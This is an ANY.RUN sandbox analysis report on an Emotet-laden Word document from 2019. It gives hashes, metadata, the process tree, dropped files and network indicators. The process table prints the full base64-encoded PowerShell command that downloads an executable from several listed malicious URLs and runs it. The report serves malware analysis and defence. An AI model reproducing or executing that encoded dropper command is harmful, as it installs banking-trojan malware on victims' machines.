analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Adjunto 20190919_1555936.doc

Full analysis: https://app.any.run/tasks/be67b50a-ccff-42fd-9efe-2968bbb46421
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 12:20:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Bedfordshire, Subject: markets, Author: Zita Auer, Comments: maroon Assistant TCP, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 08:35:00 2019, Last Saved Time/Date: Thu Sep 19 08:35:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

5A157247686E1E28E6BFDD971951E047

SHA1:

9E67ABE21AB237DB8ECF40BD0D86B13F3982807D

SHA256:

88C6F70A0709FEDEB3B9CDE8EEB54AD46DFD169517DE0126914F164FD40DA4F6

SSDEEP:

6144:vDH72i0o89p8gh2KvtYeR4BLkI07NSU4jUntATfDjXc:vDH72i0o89p8gh2KvtYeR8X07NSU4eew

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 208.exe (PID: 3228)
      • 208.exe (PID: 3940)
      • 208.exe (PID: 3312)
      • easywindow.exe (PID: 2744)
      • easywindow.exe (PID: 3512)
      • easywindow.exe (PID: 2644)
      • 208.exe (PID: 4092)
      • easywindow.exe (PID: 3200)

    • Emotet process was detected

      • 208.exe (PID: 4092)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2412)

  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2412)

    • Creates files in the user directory

      • powershell.exe (PID: 2412)

    • Executed via WMI

      • powershell.exe (PID: 2412)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2412)
      • 208.exe (PID: 4092)

    • Starts itself from another location

      • 208.exe (PID: 4092)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3412)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3412)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Bedfordshire
Subject: markets
Author: Zita Auer
Keywords: -
Comments: maroon Assistant TCP
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:19 07:35:00
ModifyDate: 2019:09:19 07:35:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Altenwerth - Wuckert
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Farrell
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 208.exe no specs 208.exe no specs 208.exe no specs #EMOTET 208.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3412"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Adjunto 20190919_1555936.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2412powershell -encod JABSAE0AbwBqAGYAWABFAFUAPQAnAGgAdwBpAF8ATgAyAFIAQgAnADsAJABDAFkAWQBmADIAUgBRADkAIAA9ACAAJwAyADAAOAAnADsAJABXAGkAaABMAFgATwBsAD0AJwBZAHIAZABVAHEAWQBSACcAOwAkAHYAUwBfADAAUwBCAGIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAWQBZAGYAMgBSAFEAOQArACcALgBlAHgAZQAnADsAJABmAE8AcgBOAHcARQBSAD0AJwBPAF8AXwBPAHYAWABIACcAOwAkAE0AagBfAHoAdwBqAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBCAEMATABpAEUAbgB0ADsAJAB2AG0AMwBQAFAATwA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAZQBmAG8AcgB0AHUAbgBhAHQAZQBuAHUAdAByAGkAdABpAG8AbgAuAGMAbwBtAC8AdgB1AHoAcAA0AG8AMgB2AGIALwBoADMALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHIAYQBuAGcAcgBlAGEAbABpAHQAeQAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwB2ADcAcgByADcALwBAAGgAdAB0AHAAcwA6AC8ALwBjAG8AZABlAG4AcABpAGMALgBjAG8AbQAvAHcAYQBuAGQAZQByAHYAbwBnAGUAbAAvADcAMABtAGoAYQA0AC8AQABoAHQAdABwADoALwAvAHAAaQBuAG0AbwB2AGEALgB4AHkAegAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB3AGkAZABzAHIAYQBxADQANgA4ADUALwBAAGgAdAB0AHAAcwA6AC8ALwBlAGMAYQBtAHAAdQBzAGsAYgBkAHMALgBjAG8AbQAvAHYAbgBnAHAALwB2ADQAMAA1AC8AJwAuACIAUwBgAHAAbABpAFQAIgAoACcAQAAnACkAOwAkAEYAVQBIAEkAZABtAGkAPQAnAFAASwBVADEAawBmAGgAbAAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBqADgAdABwAGkAQgAgAGkAbgAgACQAdgBtADMAUABQAE8AKQB7AHQAcgB5AHsAJABNAGoAXwB6AHcAagAuACIARABPAHcATgBsAGAAbwBBAGQARgBJAGAAbABlACIAKAAkAEUAagA4AHQAcABpAEIALAAgACQAdgBTAF8AMABTAEIAYgApADsAJABMAHcAYwA1AGQAMgBUAHMAPQAnAHcARgBNAHcAdQBLACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAdgBTAF8AMABTAEIAYgApAC4AIgBsAEUAYABOAEcAVABIACIAIAAtAGcAZQAgADIAOAA5ADQANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAVAAiACgAJAB2AFMAXwAwAFMAQgBiACkAOwAkAG0ARgBwAFQASABfAHUAPQAnAFYAZgByAEsAMABPAHEAJwA7AGIAcgBlAGEAawA7ACQAVwBwAFMASwA1ADQATwA9ACcAegBqAEcAYQBEAEsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcABqAGMAVQA2AHUAdwA9ACcASQBpAHcASAAwAEYAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3940"C:\Users\admin\208.exe" C:\Users\admin\208.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3228"C:\Users\admin\208.exe" C:\Users\admin\208.exe208.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3312--7522c4b8C:\Users\admin\208.exe208.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4092--7522c4b8C:\Users\admin\208.exe
208.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3200"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe208.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2644"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2744--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3512--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 720
Read events
1 253
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3412WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9B6A.tmp.cvr
MD5:
SHA256:
3412WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:1257E9C7D97EC972396406847D1DE135
SHA256:ECC9744A452621B0B35091BA2C491EBACE9B128AF8CB8ABDDFD2C07E577FDB7C
3412WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43C864F.wmfwmf
MD5:CAA08E98274D2FEE9D4CA8720BB03AB1
SHA256:747FC9ADF0704EF88A5EA16EF6B8CD5CF4A073EDB36711DD26B85C34B928CBF9
3412WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B7DEA70F335E5DDC93FE702864A27887
SHA256:5E4B0BB068B9758D42C59BDBB3E585A771C8BE51EE88F713369718C081896434
3412WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\724D4C04.wmfwmf
MD5:CE6D2F19594887E6A3216F3EA6F19157
SHA256:FC3270CF801462ED384FE1527FE4C317E406602F7AC7366CFA67799ABCDC406E
3412WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6B290B.wmfwmf
MD5:D3CA2FCB34643516129FDC1BC6B6B321
SHA256:4751BFF1F4BFFA3E72143A5EEAAC63E46CD7D00F34C240F00396DF241A47F1A8
3412WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A88F987.wmfwmf
MD5:79B984EBA44C30303D7E6D176A9AA541
SHA256:7A4ABC38A0270FFFA2CBA2F59101F746C78FD9E51E6D08C9A845B179D742DEE5
3412WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ACFF7251.wmfwmf
MD5:A47067656C6EB292EEC889ED0D42A3B0
SHA256:57409023A700391322E3A53F277ED80B63430610EEB96B991052C3B87F310112
3412WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4727F3C3.wmfwmf
MD5:2C758C8A3BD4E01F9D67AEDCF4CADB13
SHA256:1760110C67F840686BE5CA7542E403F074A38A3F7EC4379205969707C276ACA7
3412WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55DE7790.wmfwmf
MD5:006F534416745DB0CE87B9BA927FB178
SHA256:5F9BEBBFE21CF6221FB7AD0F5FE59BAE2875201CCCF6E6F4C85B57BD933E36F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2412
powershell.exe
GET
200
45.76.184.98:80
http://thefortunatenutrition.com/vuzp4o2vb/h3/
SG
executable
376 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2412
powershell.exe
45.76.184.98:80
thefortunatenutrition.com
Choopa, LLC
SG
suspicious

DNS requests

Domain
IP
Reputation
thefortunatenutrition.com
  • 45.76.184.98
malicious

Threats

PID
Process
Class
Message
2412
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2412
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2412
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Adjunto 20190919_1555936.doc